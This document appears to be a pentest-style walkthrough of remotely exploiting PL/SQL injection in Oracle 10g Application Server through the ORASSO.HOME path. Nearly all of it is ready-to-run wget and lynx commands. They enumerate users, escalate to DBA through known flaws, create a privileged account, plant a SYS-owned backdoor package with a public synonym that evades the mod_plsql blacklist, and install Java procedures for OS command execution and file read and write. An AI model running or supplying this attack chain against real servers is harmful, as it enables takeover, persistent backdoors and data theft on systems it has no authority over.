Oracle 10g Application Server till 10.1.2 .1.0 remote exploiting of what described in:
This example makes use of injection in ORASSO.HOME but these path also work:
- JAVA_AUTONOMOUS_TRANSACTION.PUSH
- XMLGEN.USELOWERCASETAGNAMES
- PORTAL.WWV_HTP.CENTERCLOSE
- ORASSO.HOME
- WWC_VERSION.GET_HTTP_DATABASE_INFO
Information gathering
View current user (should be ORASSO_PUBLIC)
1 |
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+USER_USERS" |
View roles of current user
1 |
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+*+FROM+USER_ROLE_PRIVS" |
View full users list
1 |
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+username+from+all_users" |
View the IP address of the database server
1 |
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT(´USERENV´,+´IP_ADDRESS´,+15)+ipaddr+from+dual" |
View the hostname of the database server
1 |
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT(´USERENV´,+´HOST´,+15)+ipaddr+from+dual" |
Exploiting
The user ORASSO_PUBLIC has really not much privileges and cannot create procedures, functions or packages so you can use only few exploits to elevate his privileges.
Another way is to use cursors to exploit common vulnerabilities without creating packages or functions.
Exploit #1 to grant DBA to current user (Oracle10g R1 and R2 prior to CPU Oct 2006) (an error is returned, but it works anyway!). It does not need to create packages.
1 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+SEQUENCE_OWNER+VARCHAR2(200);+SEQUENCE_NAME+VARCHAR2(200);+v_user_id+number;+v_commands+VARCHAR2(32767);+NEW_VALUE+NUMBER;+BEGIN+SELECT+user_id+INTO+v_user_id+FROM+user_users;+v_commands+:=+´insert+into+sys.sysauth$+´+||+´+values´+||+´(´+||+v_user_id+||+´,4,´+||+´999,null)´;+SEQUENCE_OWNER+:=+´TEST´;+SEQUENCE_NAME+:=+´´´,lockhandle=>:1);´+||+v_commands+||+´;commit;+end;--´;+NEW_VALUE+:=+1;+SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(SEQUENCE_OWNER+=>+SEQUENCE_OWNER,+SEQUENCE_NAME+=>+SEQUENCE_NAME,+NEW_VALUE+=>+NEW_VALUE);+END;" |
Exploit #2 (ab)using SYS.KUPW$WORKER.MAIN to execute commands as DBA
http://www.milw0rm.com/exploits/3584
1 |
http://192.168.41.5:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+MYC NUMBER;+BEGIN+MYC+:=+DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(MYC,´declare+pragma+autonomous_transaction;begin+execute+immediate+´´create+user+pippo+identified+by+pippo123´´;commit;end;´,0);SYS.KUPW\$WORKER.MAIN(´´´+AND+0=dbms_sql.execute(´||myc||´)--´,´.´);end; |
Create user PENTEST identified by PEN123TEST.
Obviously this works only if you granted dba to orasso_public.
1 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+USER+PENTEST+IDENTIFIED+BY+PEN123TEST" |
Give some specific, java related, grants to user PENTEST.
These privileges are needed if you do not wont to use java to execute O.S. commands and read/write the underlying file system using raptor_oraexec.sql
http://0xdeadbeef.info/exploits/raptor_oraexec.sql
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+DBA+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVADEBUGPRIV+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAIDPRIV+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVASYSPRIV+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAUSERPRIV+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVA_ADMIN+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SYSTEM+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SESSION+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+USER+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+JOB+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+USER+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+SYNONYM+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+ROLE+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+TABLE+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+MANAGE+SCHEDULER+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+SELECT+ANY+TABLE+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+CLASS+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+LIBRARY+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+SYNONYM+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+PROCEDURE+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+LIBRARY+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROGRAM+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+PRIVILEGE+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+PUBLIC+SYNONYM+TO+PENTEST" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROCEDURE+TO+PENTEST" |
Create a backdoor package that can works also if the vulnerability is patched.
The package is owned by SYS so each issued command is executed like SYSDBA.
1 2 3 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2);END+BACK_PKG;" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+BODY+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2)+IS+BEGIN+EXECUTE+IMMEDIATE+commandline;+END;+END+BACK_PKG;" |
Grant public execute to the backdoor package.
1 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ON+PENTEST.BACK_PKG+TO+PUBLIC" |
Creating a public synonym can be useful to run the backdoor bypassing mod_pl/sql blacklist.(be sure to not use a forbidden word to name the synonym, like sys,owa,system,etc…).
1 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE%20OR%20REPLACE%20PUBLIC%20SYNONYM%20BACKDOOR%20FOR%20PENTEST.BACK_PKG" |
Use this syntax to execute commands as SYSDBA through the backdoor (yes, it works via http too 🙂 .
1 |
wget -q -O /dev/null http://192.168.100.195:7777/pls/orasso/BACKDOOR.exec_this_code?COMMANDLINE=create%20user%20pippo%20identified%20by%20pippo123 |
This is a java procedure to access the file system and execute os commands (raptor_oraexec.sql). You can run it on a single command line or just cut & paste as it is.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace and resolve java source named PENTEST.oraexec as import java.lang.*; import java.io.*; public class oraexec { /* * Command execution module */ public static void execCommand (String command) throws IOException { Runtime.getRuntime().exec(command); } /* * File reading module */ public static void readFile(String filename) throws IOException { FileReader f = new FileReader(filename); BufferedReader fr = new BufferedReader(f); String text = fr.readLine(); while (text != null) { System.out.println(text); text = fr.readLine(); } fr.close(); } /* * File writing module */ public static void writeFile(String filename, String line) throws IOException { FileWriter f = new FileWriter(filename, true); /* append */ BufferedWriter fw = new BufferedWriter(f); fw.write(line); fw.write(\"\n\"); fw.close(); } }" |
Let´s create 3 different procedures to use the prior java source and execute command, read files, write files.
Execute commands
1 2 3 4 5 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javacmd(p_command varchar2) as language java name ´oraexec.execCommand(java.lang.String)´;" |
Read files
1 2 3 4 5 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javareadfile(p_filename in varchar2) as language java name ´oraexec.readFile(java.lang.String)´;" |
Write (append) a files
1 2 3 4 5 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javawritefile(p_filename in varchar2, p_line in varchar2) as language java name ´oraexec.writeFile(java.lang.String, java.lang.String)´;" |
Use the dbms_java.grant_permission stored procedure to give read,write,execute on file system (/) to the user PENTEST
1 2 3 4 5 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission(´PENTEST´,´SYS:java.io.FilePermission´,´/´,´read´ )" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission(´PENTEST´,´SYS:java.io.FilePermission´,´/´,´write´ )" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission(´PENTEST´,´SYS:java.io.FilePermission´,´/´,´execute´ )" |
Give public execute grant to the new stored procedures oraexec.*
1 2 3 4 5 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javacmd to public" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javareadfile to public" wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javawritefile to public" |
Here we go, let´s run some os command (remember to use full paths).
1 |
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);pentest.javacmd(:1);--=/usr/sbin/ping 192.168.100.1" |